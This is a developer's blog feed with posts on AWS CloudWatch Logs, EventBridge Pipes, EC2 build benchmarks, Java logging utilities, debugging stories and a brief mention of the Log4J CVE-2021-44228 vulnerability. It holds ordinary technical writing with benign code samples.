tag:blogger.com,1999:blog-52107581344061788542024-03-09T21:46:32.000-05:00blog.kdgregory.comkdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.comBlogger228125tag:blogger.com,1999:blog-5210758134406178854.post-57753491164725329292024-03-04T06:28:00.004-05:002024-03-04T07:53:55.227-05:00Ordinary Users Don't Stand a Chance<p> I have a “tax PC”: an old HP running Windows 10, that spends ten
months of the year in a closet, and two months hooked up to a segment of my
home network where it's unlikely to be attacked by the various network-attached
devices living in my house. Each February I spend a couple of days applying the
year's accumulated Windows updates, then I install Turbo-Tax so that I can do my
taxes.
<p> This year the Turbo-Tax installation failed:
<p> <img src="https://kdgregory.com/images/blog/turbotax_installation_error.png"
alt="Turbo-Tax installation error"/>
<p> I Google for the missing DLL, and end up on a Microsoft-hosted discussion board
where the first answer says that I need to update my Visual C++ runtime, <em>and
provides a link to some third-party software site</em>.
<p> I look in my computer's list of applications and see that I have the
“2010” runtime. Apparently that isn't something that Windows
Update considers important. So I go to a Microsoft-hosted page, download
the x64 version of the runtime (because the Windows “About”
page tells me that I have an x64 computer with 64-bit OS installed), and
… get the same error.
<p> Perhaps Turbo-Tax isn't using the latest Visual C++ (never mind that the
runtime advertises itself as being for 2015 onward). So I downloaded and
installed the x64 versions the other runtimes, rebooted, and tried again.
And the installer failed again.
<p> Intuit provides a page titled “Troubleshoot installation and running
TurboTax for Windows.” This page is the first result if you go to their
Support page and search for the DLL name. It tells you to do things like
“Check your TurboTax CD and computer's CD drive” and “Clean
up and defragment your hard drive.”
<p> I kept digging through search results, and eventually I found a discussion
board posting in which someone says that they had to install the x86 version
of the Visual C++ runtime. OK, that makes sense: lowest-common denominator,
X86 libraries work on an x64 processor. So I did that, installed, rebooted,
and the installer ran successfuly. According to a comment on that thread,
the runtime should have been provided on the Turbo-Tax CD but wasn't.
<p> I've been a professional software developer for 40 years. I don't use Windows,
but I know what a DLL is, and I'm comfortable with searching the web for
answers. More important, I can identify a sketchy answer, and don't download
from random links on the Internet. But what about people that don't have that
knowledge?
<p> Maybe there aren't any other people who run Turbo-Tax locally, installing from
physical media. Or maybe everybody else installs on their brand-new PC running
Windows 11, with all the latest runtimes installed. But I have to believe that
I'm not unique. There must be other people that have run into this problem.
<p> What do they do?
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-38327193384180508822023-07-13T08:15:00.003-04:002023-08-22T07:06:45.134-04:00Buggy Behavior From The CloudWatch Logs API<blockquote>
<strong>Tip 26: “select” isn't broken.</strong>
<br/> The OS is probably not broken. And the database is probably just fine.
</blockquote>
<p class="inset"> <a href="https://pragprog.com/titles/tpp20/the-pragmatic-programmer-20th-anniversary-edition/" target="_blank">The Pragmatic Programmer</a>
<p> Words to live by — although I <em>did</em> once find a problem with Oracle's index management, which manifested in <code>select</code>. In my opinion, it's <em>the</em> maxim that defines a senior developer. Junior developers always look outside themselves whenever they run into a problem. Senior developers do everything they can to find where they've made a mistake. After all, there are a lot of people doing exactly the same things that you are; surely they would have found the bug first.
<p> But sometimes, it really is a bug in the system. This post is a story of how I determined the bug wasn't in my code. It's part catharsis, part “here's what you should do if you think select <em>is</em> broken,” and part calling out the issue for posterity in case someone else trips over it.
<p> In January of this year (2023), AWS made a change in the CloudWatch Logs API: you no longer needed to provide a sequence token when calling <a href="https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html" target="_blank">PutLogEvents</a>. Sequence tokens were always, I think, a “leaky abstraction”: a part of the internal implementation of CloudWatch Logs that found its way into the API. To summarize: you had to retrieve a sequence token before you could write events. When you wrote a batch of events, you received a sequence token back, which you could use to write the next batch — <em>unless</em> another process was writing to the same stream, in which case your sequence token would become invalid. Which meant that you had to retrieve a new token, using an API that had a relatively low limit on number of requests per second. With enough concurrent writers, hilarity would ensue as each would retrieve a token, try to use it, and fail because some other writer got there first.
<p> This change directly impacted <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">my logging library</a>, but initially I wasn't planning to adopt it: the library worked, the old behavior was supported, and to be honest, releasing the library involves a lot of toil. But then someone found a bug with my sequence-token retrieval code if the logging library happened to re-initialize itself (Log4J2 FTW!). I fixed the immediate bug, and released a patch, but then decided it was a sign from the universe that I should remove the sequence token entirely. Plus, it always feels good to delete code!
<p> However, once I changed the code, one of my integration tests — the one that pits concurrent writers against each other — started failing. When it tried to verify the events that were written, it would often come up short.
<p> Failing integration tests are nothing new to this library: CloudWatch is an “eventually consistent” system, and while “eventually” often means seconds, it sometimes takes longer for the service to become consistent. As a result, failing tests <em>don't clean up after themselves</em>, so that I can look at what happened. I could then use my <a href="https://github.com/kdgregory/aws-misc/blob/trunk/utils/logs_reader.py" target="_blank">log reader utility</a>, and verify that all of the events were eventually available.
<p> This time, I didn't get all of the events back. Of course, I assumed that my reader was incorrect, and dove back into the documentation for the API calls it was using. I experimented with different arguments to the <code>GetLogEvents</code> call, and also tried <code>FilterLogEvents</code>. But nothing I did had an effect: I was still missing log entries.
<p> Next step was to dig into the logging library. I already had it fairly well instrumented: if you enable debug mode in the logging framework it will report everything that it does, including (optionally) every batch that it sends. Everything looked good, but there was a corner case that worried me: CloudWatch can reject events, and unlike Kinesis, it doesn't tell you which events it rejects. The appender pre-processed batches to remove invalid events, but didn't log failures (because there shouldn't be any). I changed that code, but no failures appeared.
<p> At this point I didn't think the bug was in my appender, but there was always the possibility that I was doing something incorrectly that I didn't log. My next step for debugging the appender would have been to turn up the logging level within the AWS SDK, to get a detailed report of what it was doing. However, this can become a case of drowning in detail, so first I looked at alternative methods of verifying the events.
<p> In addition to the <code>GetLogEvents</code> and <code>FilterLogEvents</code> API calls, CloudWatch provides a <a href="https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_StartQuery.html" target="_blank">query</a> API. This API requires you to submit a query and then loop until it's done, so I didn't have a utility program that used it. But it's what the Console uses in the Insights page.
<p> So I wrote a simple query to retrieve events from the stream; I was actually more interested in the reported count, rather than looking at all 20,000 expected events. But Insights told me that there weren't <em>any</em> events in the stream.
<p> At this point, I opened a ticket with AWS Support (fortunately, I have access to an account with a Business support contract, since “Basic” support no longer allows technical questions). I received an answer that “as designed,” Insights does not return any messages with timestamps prior to the log group's creation time. WTF?!?
<p> The back-story is that my Log4J 1.x appender lazily creates the log group and stream when it first writes a batch of messages, because Log4J 1.x does not have an explicit initialization phase. This is definitely something to be aware of if you use my library with Log4J 1.x (and, overwhelmingly, that's what my download counts indicate people are doing). The solution is to pre-create your log groups, so I modified the test to do so. This is not an issue with Log4J 2.x and Logback, which do have an initialization phase.
<p> But the test continued to fail. However, I could view the logs in Insights, and saw that <em>it</em> was able to retrieve all of the events (yet another approach, which also succeeded, is export to S3). And more interesting, it was the <em>initial</em> few log messages that weren't being retrieved by <code>GetLogEvents</code>. I also called the <code>DescribeLogStreams</code> API, and it returned a later “first event timestamp” than expected, by a few milliseconds.
<p> This seemed worth another Support ticket: if I could retrieve all log events using one technique, and not using another, then clearly it was a problem with CloudWatch and not me.
<p> And now comes the most important lesson from this entire adventure: <em>do not assume that the AWS Support rep can see what you're describing</em>, and more important, <em>do not expect them to tell you that they can't</em>.
<p> I had created a log group/stream that demonstrated the problem, referenced it in the ticket. I also attached the S3 export, the list of events from my log reader, and the initial events from an Insights query. The support rep seemed to agree that there was a problem. Then for a week they wrote nightly updates about how they were trying to re-upload the events and did not see a problem. They seemed to be trying random things, so I recommended building my library and running the integration test — at this point, my assumption was that AWS accepted that there was a problem based on my example group/stream, and were simply trying to re-create at will.
<p> It turned out this was an incorrect assumption, which I learned when the original rep went dark and a new rep picked up the case. I had independently created a program that triggered the issue, so that they wouldn't have to run the integration tests. The new rep claimed to have run the program, did not see the issue, and pointed out that AWS did not have permission to view the original log group and stream that I had identified in the ticket!
<p> Seeing that the “web” interactions were not having any effect, I decided to try a chat session with a screenshare. I showed the rep the original group and stream, and how different retrieval methods returned different results. At the time it didn't seem to have much effect: he made sounds of acknowledgement, but was unable to assume the role I created to let him read events, and would go silent for minutes at a time while he was “try[ing] something.” All-in-all, not a great experience from my side.
<p> But it did seem to have an effect: the next morning I got a message from someone who claimed to be on the CloudWatch team, saying that they were able to re-create the problem. And that's where it stands today. For my part, the updates to my library are on hold until I hear back: while this may be superstition on my part, it seems to work better if I provide a sequence token (I suspect it's actually the delay from retrieving the token).
<p> And if you run into a problem with <code>GetLogEvents</code> not returning all of your events, feel free to reference case #12882575541 if you file a Support ticket.
<p> <strong> Update, 2023-08-22 </strong>
<p> AWS has resolved the problem: "We investigated and found that there was an issue with the service which in rare situations can incorrectly set the "firstEventTimestamp" on a log-stream [...] Our team has now fixed the issue with GetLogEvents not returning some events due to incorrectly set "firstEventTimestamp"." Have verified that my integration tests run (repeatedly) without a failure. It took just under three months (05/23 to 08/18) to resolve the case, two months (06/15) from the point that someone took it seriously. For a company the size of AWS, and a service with the reach of CloudWatch Logs, that seems pretty fast; I've had issue drag on far longer with in-house IT teams.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-76846394998461305702023-01-03T07:19:00.003-05:002023-03-03T14:56:28.905-05:00Using EventBridge Pipes to route CloudWatch Logs events to Kinesis<p> Several years ago I <a href="https://blog.kdgregory.com/2019/09/streaming-cloudwatch-logs-to.html" target="_blank">wrote about</a> connecting CloudWatch Logs into into a <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline" target="_blank">logging pipeline</a> built on Kinesis Streams and Kinesis Firehose. To make that work, I wrote a <a href="https://github.com/kdgregory/aws-misc/tree/trunk/lambda/cloudwatch-log-transform" target="_blank">Lambda</a>.
<p> AWS announced EventBridge Pipes at re:Invent 2022, as an easy way to connect messaging services. Connecting CloudWatch Logs to Kinesis seemed like a good way to kick the tires on this service. It still requires a custom Lambda, but that Lambda is now much simpler, because it doesn't need to concern itself with the quirks of <code>PutRecords</code>.
<h2> The Problem </h2>
<p> When you subscribe a Kinesis stream to a log group, CloudWatch writes messages that look like this:
<pre class="codeSample">
H4sIAAAAAAAAA62QTU7DMBCF95zC8jqO7LHd2NkFNVRCdNWyggqF1gqG/MlxW6qqd2cK7QWA5bw382a+OdLWjWNVu+VhcDSn02JZvMzLxaKYlTSh/b5zAWUBUulJZiwXgHLT17PQbwd0imFw3caF8rNqh8b9mIsYXNWi+9DX6l6wi8mAAwgAxXx88413HZNaWDHBqXH7Oq6DH6LvuzvfRBdGmj/Ra+zqO7fcuS6e9SP1G4yXGRgltdLcGK41SKu0AQ2KC55hrYTNsJCWc5CCW5CgteEG90WP4BHDaS4mmTDGAOKBTa4PwfjzuUwAA0W4yUHl0iTYQqbl7eOMPLkLFV+Rdd+mH5s6uLoPhxQvVe9ptR/TS0s6r3xHGNlVzdYRPxINzx09JX/DsP+LIX6LsTrdfAHRwAP2RwIAAA==
</pre>
<p> That's a GZipped and Base64-encoded JSON object. When decoded, unzipped, and pretty-printed, it looks like this:
<pre class="codeSample">
{
"messageType": "DATA_MESSAGE",
"owner": "123456789012",
"logGroup": "AppenderExample",
"logStream": "Log4J1-Example-20221224-ithilien-351916",
"subscriptionFilters": [
"Example"
],
"logEvents": [
{
"id": "37284354508805523945825240107552419724039002310923255808",
"timestamp": 1671888278929,
"message": "2022-12-24 08:24:38,929 DEBUG [example-0] com.kdgregory.log4j.aws.example.Main - value is 52\n"
},
{
"id": "37284354508805523945825240107552419724039002310923255809",
"timestamp": 1671888278929,
"message": "2022-12-24 08:24:38,929 DEBUG [example-1] com.kdgregory.log4j.aws.example.Main - value is 52\n"
}
]
}
</pre>
<p> As you can see, CloudWatch combines multiple log events into a single message. However, most destinations — such as Elasticsearch — want individual events, not a nested array. So you need something that pulls apart the original event. For example, the <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/CWL_OpenSearch_Stream.html" target="_blank">AWS-provided OpenSearch integration</a>, which subscribes a Lambda to the log group, decomposes the messages, and writes them to the cluster. My previous implementation did a similar transformation, but wrote the log messages to a Kinesis stream.
<h2> EventBridge Pipes </h2>
<p> <a href="https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes.html" target="_blank">EventBridge Pipes</a> is modeled around a four-step process (image sourced from docs):
<p> <img src="https://docs.aws.amazon.com/images/eventbridge/latest/userguide/images/pipes_overview.png" width="90%" alt="EventBridge Pipes data flow"/>
<p> For simple pipelines, EventBridge gives you a “no code” solution that eliminates the middle two steps: you define an output format using path references to fields in the input messages. Unfortunately, this isn't usable for CloudWatch Logs messages: it can't (currently) handle Gzipped data, and can't extract the elements in an array. So we need to add an “enrichment” step that performs this operation.
<h2> Implementation </h2>
<p> You can implement the enrichment step in multiple ways, including an HTTP(S) API, but the easiest is a Lambda. Pipes invokes this Lambda with an event that contains one or more source records, and it returns returns zero or more result records.
<p> The source event looks like this:
<pre class="codeSample">
[
{
"eventSource": "aws:kinesis",
"eventVersion": "1.0",
"eventID": "shardId-000000000000:49636526735590005452916707570422271019264002608211165186",
"eventName": "aws:kinesis:record",
"invokeIdentityArn": "arn:aws:iam::123456789012:role/CloudWatchTransformPipeline-PipeRole-us-east-1",
"awsRegion": "us-east-1",
"eventSourceARN": "arn:aws:kinesis:us-east-1:123456789012:stream/log-subscription",
"kinesisSchemaVersion": "1.0",
"partitionKey": "87362ce96c65eb1b3125bf0129b99bee",
"sequenceNumber": "49636526735590005452916707570422271019264002608211165186",
"data": "...",
"approximateArrivalTimestamp": 1672490859.613
}
]
</pre>
<p> The first thing to call out is that this event is an array. EventBridge Pipes can batch messages together, so you must loop over the entire event and combine the results from each message (ie, a flat-map):
<pre class="codeSample">
def lambda_handler(event, context):
result = []
for message in event:
result += transform_messages(message)
return result
</pre>
<p> The <code>data</code> element is the GZipped and Base64-encoded message that I showed above. You process it with code that looks like this:
<pre class="codeSample">
data = base64.b64decode(message['data'])
data = gzip.decompress(data)
payload = json.loads(data)
</pre>
<p> The last thing to be aware of is that there are two types of messages that you'll get from a CloudWatch Logs subscription, identified by the <code>messageType</code> field. When the subscription first starts, CloudWatch sends a control message to the stream to verify that it can write messages. After that, it sends data messages. Your Lambda should ignore everything but the latter.
<pre class="codeSample">
if payload['messageType'] == 'DATA_MESSAGE':
# extract log events
else:
return []
</pre>
<h2> Conclusion </h2>
<p> This post has shown you the basics of an EventBridge Pipes transform. You can find my complete example, which performs several transforms on the log events, <a href="https://github.com/kdgregory/aws-misc/tree/trunk/lambda/cloudwatch-log-transform-2" target="_blank">here</a>.
<p> While I don't think that EventBridge Pipes quite lives up to the hype of Werner Vogels' keynote (and that it has nothing in common with EventBridge other than a name), it does allow you to focus on your logic rather than the quirks of your source and destination. As such, it's a useful addition to your data transformation toolbox.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-46879988192411479512023-01-01T10:01:00.001-05:002023-01-01T10:01:35.343-05:00Does that i4i.metal instance really help your build times?<p> Here in Philadelphia, the last day of 2022 was rainy and foggy; a day to stay inside. That, combined with $100 in AWS credits that were due to expire with the new year, made me decide to add another entry to my <a href="https://blog.kdgregory.com/2014/06/is-that-ssd-really-helping-your-build.html" target="_blank">series of posts</a> <a href="https://blog.kdgregory.com/2015/06/the-encryption-tax.html" target="_blank">evaluating</a> <a href="https://blog.kdgregory.com/2018/08/poor-efs-performance-for-software-builds.html" target="_blank">build</a> <a href="https://blog.kdgregory.com/2021/02/efs-build-performance-revisited.html" target="_blank">performance</a>. This time, I'm comparing my desktop PC to the current AWS king of the hill, an i4i.metal instance.
<p> If you don't make a habit of reading EC2 instance specs, the i4i.metal has 128 virtual CPUs (32 actual cores), 1 terabyte of RAM, 30 terabytes of locally-attached SSD storage spread over 8 drives, and 75,000 megabits of network bandwidth. It costs $10.982 per hour ($96,268.212 per year) on-demand in us-east-1. There are more expensive EC2 instance types; the p3dn.24xlarge costs $31.212 per hour, but has fewer vCPUs, less memory, and less disk.
<p> To see if the local SSD offered a performance improvement over EBS, I configured a 1 terabyte gp3 drive as the machine's root volume, and formatted one of the attached SSDs as ext4. I created a separate user, whose home directory was on the SSD, so all of the reads and writes for the builds should have stayed there.
<p> As a comparison, I have my ten-year-old desktop: an i7-3770k (not overclocked) with 32 GB of RAM and a 512 GB Samsung 860 Pro SSD. It cost around $750 to build (no graphics card). I also spun up an m5.large EC2 instance, for consistency with previous tests.
<p> Both of the AWS instances were running Amazon Linux 2; my devbox runs Xubuntu 20.04. All machines ran OpenJDK 1.8, although the specific builds varied (it's whatever the package manager installed). And I manually installed Maven 3.5.4 on all of the machines (it's what I'm running at home).
<p> For a test workload, I built the <a href="https://github.com/aws/aws-sdk-java-v2" target="_blank">AWS V2 Java SDK</a> (commit <code>0f7779ef</code>, corresponding to version 2.19.9-SNAPSHOT). This is a much bigger build than most people will ever deal with: almost 400 sub-projects, and over 100,000 Java files (including tests and generated code). I skipped tests, because it was clear that some of the tests involved timing delays; I wanted to see pure CPU/disk performance.
<p> I ran three builds with each configuration. The first was a “clean” build, forcing Maven to download all dependencies. The second was with empty buffer cache (<code>echo 3 > /proc/sys/vm/drop_caches</code>), and the third, run immediately afterward, should have benefited from any files that were in the cache. As it turned out, the numbers were so close that it didn't make sense to report them separately; all numbers in the table below are from the “empty cache” run (ie, no downloads involved). As with previous tests, I show the output from the Linux <code>time</code> command; the “real” column is the elapsed time of the build, and is what developers care about.
<table>
<tbody>
<tr> <th> </th>
<th> Real </th>
<th> User </th>
<th> Sys </th> </tr>
<tr> <th align="left" style="padding-right: 1em;"> My DevBox </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 27m 24.406s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 80m 3.772s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 1m 16.792s </code> </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> m5.large </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 54m 40.495s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 94m 1.207s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 1m 46.047s </code> </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> i4i.metal EBS </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 17m 49.500s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 97m 30.694s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 2m 19.089s </code> </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> i4i.metal SSD </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 17m 44.165s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 97m 6.427s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 2m 11.365s </code> </td>
</tr>
</tbody>
</table>
<p> I have to be honest, I was surprised: I expected a small improvement in performance, but not 35%! My guess at the reason for the difference, based on the higher ”user” time, is that it's able to make more effective use of those 32 cores. The 55 MB CPU cache (versus 8MB on my PC) may have helped as well. I think the only way to summarize this test is with the words of Ferris Bueller:
<blockquote>
It is so choice. If you have the means, I highly recommend picking one up.
</blockquote>
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-82619647590551827842022-12-14T07:38:00.000-05:002022-12-14T07:38:11.382-05:00Deprecating log4j-aws-appenders<p> I just made what I hope is the last release of my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">log4j-aws-appenders</a> library. It started almost six years ago as a "weekend project" to produce a Log4J 1.x appender that wrote output to CloudWatch Logs. It has expanded over the years: I added Kinesis Streams and SNS as destinations, added support for Log4J 2.x and Logback, added support for the AWS 2.x Java SDK, and maintained the code as something I could be proud of.
<p> And other people found it useful: it's received a handful of GitHub stars, and sees around 30,000 downloads a month from Maven Central (overwhelmingly for Log4J 1.x!).
<p> But I think it's outlived its usefulness, and there are better options.
<p> I'll start with an explanation of why I wrote it. At the time, I was working on a project that had around a hundred EC2 virtual machines running pre-baked AMIs, and using the AWS-provided logging agent to write to CloudWatch. The pre-baked AMI meant that everything went to the same log stream: we didn't configure separate streams for separate instances. The agent wasn't (at that time) very good at recognizing the boundaries between log messages, and the multi-threaded nature of our servers meant that messages would be interleaved anyway. Throw in CloudWatch's limited ability to filter messages, and the result was a mess.
<p> As a result, I had two explicit goals for the first release: ensure that a Java LogEvent was written as a single CloudWatch Logs event (including stack traces), and allow different instances to write to different log streams. And this was better, but not great, because it still meant interleaved messages from different threads. So I implemented the Kinesis appender, <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline" target="_blank">to send log messages to Elasticsearch</a>. I don't think my boss liked the monthly cost of a six-node Elasticsearch cluster, but the other developers liked the ability to quickly isolate a single web request and all of its related operations.
<p> So why deprecate it? The answer is that the AWS world has moved forward in the past six years. CloudWatch is the default logging destination for Lambda and ECS, and the CloudWatch agent for EC2 has gotten much better. And Insights has made searching CloudWatch much easier, especially if you write log messages in JSON.
<p> So rather than swim against the flow, I recommend that you use CloudWatch Logs rather than my library. For Lambda (and ECS or EKS with the <code>awslogs</code> driver), just write to Standard Error; it will be picked up by the runtime and sent to CloudWatch. For EC2, use the logging agent, configured to parse individual events. If you want to use Elasticsearch, you can <a href="https://blog.kdgregory.com/2019/09/streaming-cloudwatch-logs-to_12.html" target="_blank">use a subscription</a> to get the data out of CloudWatch Logs (something that's become easier with EventBridge Pipes, the topic of an upcoming post). Or you can use an HTTP appender (available in all the major logging frameworks), and wire up your own pipeline using API Gateway's Kinesis integration (something else that wasn't available six years ago).
<p> With all of these options, my library is superfluous. And while I think it's mature, stable, and bug-free, using it exposes your project to the risk of having a single volunteer maintainer responsible for a key part of your infrastructure.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-53028789184766654022022-05-07T09:00:00.004-04:002022-05-07T09:00:59.767-04:00A Self-Made Bug<p> Chasing a bug can be one of the most frustrating parts of software development. All you have to start with is an observed behavior. Hopefully you can replicate that behavior. You then have to gather the information needed to understand what caused the bug, which is mostly about ruling out what <em>didn't</em> cause it. With luck, you have the tools (logging, system utilities) that let you do this.
<p> And then, when you figure out what it is and fix it, most of the time your thought is “wow, that was dumb.” It's definitely not the same feeling you get when you finish a challenging feature.
<p> This is the story of me tracking down a bug. I'm writing it as a form of catharsis, but also because I think it illustrates the lengths a developer has to go to to prove that something <em>is</em> a bug. In this case, it wasn't, really, just me doing something dumb and not realizing it.
<p> The story starts with me implementing what I thought would be a simple web service to let a client upload large files to S3. Simple, because I started with an example that I'd <a href="https://chariotsolutions.com/blog/post/two-buckets-and-a-lambda-a-pattern-for-file-processing/" target="_blank">written for a blog post</a>. After a couple of hours to convert something intended as a teaching tool into something user-friendly and easy to deploy, and I was ready to test. Some small files went through with no problem, so I selected a 12.5 GB file and went for a bicycle ride.
<p> When I got back, there was no browser running.
<p> The first rule of debugging is that you need to reproduce the bug, so I started the upload again and switched my focus to another task. An hour or so later, I went back to the VM running my test, and again, no browser running.
<p> I started the upload again, and paid careful attention to the requests flowing through the Network tab in the Firefox developer tools. Everything looked good, so I turned to <a href="https://www.man7.org/linux/man-pages/man1/top.1.html" target="_blank">top</a>: when programs die unexpectedly, it's often due to memory errors. Sure enough, I saw that the resident set size (RSS) kept growing.
<p> OK, probably a bug in my code. I'm not much of a JavaScript developer, and don't really understand how it manages memory, so I'm probably holding onto something unintentionally. Fortunately, <a href="https://github.com/chariotsolutions/aws-examples/blob/trunk/two_buckets_and_a_lambda/static/js/credentials.js" target="_blank">the code is simple</a>, and I was able to set a breakpoint in a "progress monitor" callback. After digging through various object trees accessible from my code, I was convinced that nothing I did caused the problem.
<p> Time to turn to Google (and <a href="https://duckduckgo.com" target="_blank">Duck Duck Go</a>, which I'm trying as an alternative), to see if maybe there's something wrong with the AWS JavaScript library. I didn't expect to find anything: the second rule of debugging is that when you think there's a problem with a commonly-used library, it's you. But I was using an older version of the library, and perhaps uploading 12 GB from the browser was unusual enough to hit a corner case. Unfortunately, most of the search hits were from Stack Overflow, and were basic “how do I use this library?” questions.
<p> One of the great things about having browsers built by different companies is that you can do comparison tests. I fired up Chrome, started the upload, and watched <code>top</code>; no change in its RSS, and the overall available memory remained constant. I started a Windows VM and did the same thing with Edge, and while the Windows Task Manager doesn't give the level of information that <code>top</code> does, it also appeared to handle the upload without a problem.
<p> More Googling, now on Firefox memory issues. And from that, I learned about <code>about:memory</code>, which lets you see the memory usage of every Firefox process. With that page open in one window, I started my upload from another. After a gigabyte or so of the upload, I checked the memory dump … and it didn't show any excess memory consumption. Neither did <code>top</code>. WTF?!?
<p> At this point it hit me: every time the browser crashed, I had Developer Tools open. So the browser was holding onto every chunk of the file that it uploaded, in case I wanted to go to the Network tab to inspect those requests.
<p> Is there a lesson here? Not really; it's just an example of following the process I first wrote about <a href="https://blog.kdgregory.com/2009/12/debugging-101-assumptions.html" target="_blank">a dozen years ago</a>. But as I said, it's catharsis, and a reminder that most problems are PEBKAC: Problem Exists Between Keyboard And Chair.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-10006630025423851392022-02-24T07:47:00.002-05:002022-02-24T07:47:15.148-05:00Leveraging try-with-resources to manage the mapped diagnostic context<p> The mapped diagnostic context is an under-appreciated feature of logging
libraries. It's essentially a thread-local <code>Map</code>, to which you
add key-value pairs that provide context about what your program is doing.
Here's a trivial example:
<pre class="codeSample">
logger.info("program starting");
File file = new File(argv[0]);
MDC.put("outputFile", file.getAbsolutePath());
try (FileOutputStream fos = new FileOutputStream(file);
OutputStreamWriter osr = new OutputStreamWriter(fos, StandardCharsets.UTF_8);
BufferedWriter out = new BufferedWriter(osr))
{
logger.info("starting to write");
out.write("hello, world");
out.newLine();
logger.info("finished writing");
}
MDC.remove("outputFile");
logger.info("program finished");
</pre>
<p> When you run this program, using a logging config that outputs the MDC, you'll
see something like this:
<pre class="codeSample">
2022-02-23 07:28:01,673 INFO [main] c.kdgregory.example.Main - - program starting
2022-02-23 07:28:01,677 INFO [main] c.kdgregory.example.Main - outputFile=/tmp/test.txt - starting to write
2022-02-23 07:28:01,677 INFO [main] c.kdgregory.example.Main - outputFile=/tmp/test.txt - finished writing
2022-02-23 07:28:01,677 INFO [main] c.kdgregory.example.Main - - program finished
</pre>
<p> Web-apps can benefit enormously from the MDC: before processing the request, you
extract things like the invoking user, request path, session token, or a unique
request ID. This makes it easier to track down problems, because you can filter
the log by any of those parameters.
<p> But I've recently been doing a lot of data engineering work: reading files or database
tables, performing some transformation on them, and sending them to some destination.
These tasks tend to be complex, with multiple steps, and they tend to be performed
for multiple files or tables at a time. As with a web-app, it's really nice to add
contextual information such as table name and selection criteria to the MDC, and let
the logging framework write it with every message.
<p> The problem with the MDC is that every <code>put()</code> has to be paired with a
<code>remove()</code>. If you forget to remove a key it will “pollute”
every subsequent log message from that thread, giving you potentially misleading
information.
<p> However, one thing that I noticed is that I tend to set the MDC just before a
try-with-resources block. Or inside a loop that calls one or more functions that could
be wrapped in such a block. This led me to the <code>AutoMDC</code> class:
<pre class="codeSample">
logger.info("program starting");
File file = new File(argv[0]);
try (AutoMDC mdc = new AutoMDC("outputFile", file.getAbsolutePath());
FileOutputStream fos = new FileOutputStream(file);
OutputStreamWriter osr = new OutputStreamWriter(fos, StandardCharsets.UTF_8);
BufferedWriter out = new BufferedWriter(osr))
{
logger.info("starting to write");
out.write("hello, world");
out.newLine();
logger.info("finished writing");
}
logger.info("program finished");
</pre>
<p> Try-with-resources works with classes that implement <code>java.lang.AutoCloseable</code>:
an interface that declares the <code>close()</code> method. My <code>AutoMDC</code> class
implements this interface, and uses a <code>Set<String></code> to keep track of the
keys. It provides two methods (and the “convenience” constructor shown above):
<pre class="codeSample">
public AutoMDC put(String key, Object value)
{
keys.add(key);
MDC.put(key, String.valueOf(value));
return this;
}
@Override
public void close() throws Exception
{
for (String key : keys)
{
MDC.remove(key);
}
}
</pre>
<p> That's it: you can add items to the MDC in the try-with-resources initializer, or anywhere
inside the <code>try</code> block itself, and they'll be removed at the end. One downside
is that the <code>close()</code> method is called before any <code>catch</code> or
<code>finally</code> blocks; if you need to log contextual information in those places,
you'll need to do it manually.
<p> If you'd like to use this in your own programs, I've provided an implementation for
Logback as a <a href="https://gist.github.com/kdgregory/4574fd48c4875abc295ac6d54029ea02"
target="_blank">GitHub gist</a>; the same basic code can be adapted to whichever logging
framework you use.
<p> I think the idea of leveraging try-with-resources is a useful one for other situations,
especially those where you might otherwise turn to aspect-oriented programming. Plus,
it encourages the good habit of wrapping your code in try/catch blocks.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-79061194976371083492021-12-18T10:24:00.005-05:002021-12-20T16:54:34.970-05:00My take on the Log4J 2.x vulnerability<p> A week ago, a lot of Java application developers learned that their applications harbored a severe vulnerability, courtesy of the Log4J 2.x logging framework. The vulnerability, <a href="https://www.cve.org/CVERecord?id=CVE-2021-44228" target="_blank">CVE-2021-44228</a> allowed execution of arbitrary code on any system that logged unsanitized user input using the Log4J 2.x library. This prompted a lot of people to scramble to protect their systems, and a lot of people to take to Twitter with opinions of What It All Means.
<p> As the maintainer of an <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">open-source library that integrates with Log4J</a>, I spent my Saturday morning understanding the bug and updating my examples to use versions of the library that mitigated the problem. Fortunately, my library is not directly affected, as long as its consumers don't use unsanitized data to configure the logging framework.
